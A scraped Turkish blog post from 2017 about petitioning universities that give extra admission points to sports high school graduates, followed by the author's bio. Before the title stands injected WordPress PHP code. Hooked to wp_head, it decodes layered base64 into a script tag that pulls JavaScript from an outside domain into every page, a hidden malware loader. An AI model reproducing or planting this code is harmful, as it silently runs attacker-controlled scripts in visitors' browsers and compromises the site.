function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); 2017 Spor Lisesine Ek Puan Veren Üniversitelere Verilecek Dilekçe Örneği – Besyo Hakkında Güncel Bilgiler

2017 Spor Lisesine Ek Puan Veren Üniversitelere Verilecek Dilekçe Örneği

9 Ağustos 2017
Genel
0 7

Lütfen Okuyunuz!!
Öncelikle şahsım adına konuşmam gerekirse spor lisesi çıkışlıların ön planda olması taraftarı olan birisiyim. Ancak, ilgili kanun çıktığı için ve bir çok üniversite listesini güncellediği için sorunun ilerleyen süreçte çok daha  trajik hale gelmemesi için bu girişimde bulunmak zorundayız. Besyocuyuz.com olarak yasaların gereğini uygulamak ve yasalarla ilgili sıkıntı teşkil eden bir durum oluştuğunda ona yönelik organizasyon yapmak ile mükellef olduğumuzu belirtelim. Spor Lisesi çıkışlı adaylar için ek puan alması konusundaki organizasyonumuzu Eylül ayında başlatacağız.
Umarım sonuca ulaşabiliriz…
 Şuan ek puan veren üniversitelere dilekçe yazmamızın temelinde, Ege üniversitesini yıllar önce kazanan öğrencilerin 3. sınıfa geçerken yanlış hesaplama ile kazandınız diye okuldan atılması yatmaktadır. Bu atılan öğrenciler hukuksal süreçte haklarını aramak için kazanılmış hak davası açtıklarında, kazanılmış hak; kişinin o an ki kurallar çerçevesinde doğru hesaplamalarla elde etmiş olduğu haktır ve o geri alınamaz. Sizin muhatap olduğunuz konu yanlış hesaplama sonucu verilmemesi gereken hakkın verilmesidir deyip davayı düşürmüştür. İlerleyen süreçte spor lisesinden 2017 yılında mezun olan adayların bu tarz trajik bir olay yaşamaması için bu organizasyonu yapıyoruz. Spor lisesine bir uyuzluğumuzun olması söz konusu dahi değildir. Kanunlar maalesef bu şekilde….

2017 mezunu spor lisesine ek puan veren üniversitelere  yönelik Bu dilekçeyi kendi el yazınızla doldurup, elden üniversiteye verdiğinizde sonuca ulaşmanız kuvvetle muhtemeldir.

Dilekçe Örneği

0
http://www.instagram.com/alp.besyocuyuz

1993 yılında Bursa'da doğdum. Küçük yaşlarda spora merak salmaya başladım. Ailemin de desteğiyle çok küçük yaşlarda spora başladım. 2012 yılında Kastamonu Üniversitesi spor yöneticiliği bölümünü kazandım. Kastamonu'yu çeşitli sebeplerle bırakıp. 2015 yılında tekrar sınava girip Ankara Üniversitesi Antrenörlük bölümünü kazandım. 2017 Yılında Uludağ üniversitesine geçiş yaptım

Bir Cevap Yazın

Menü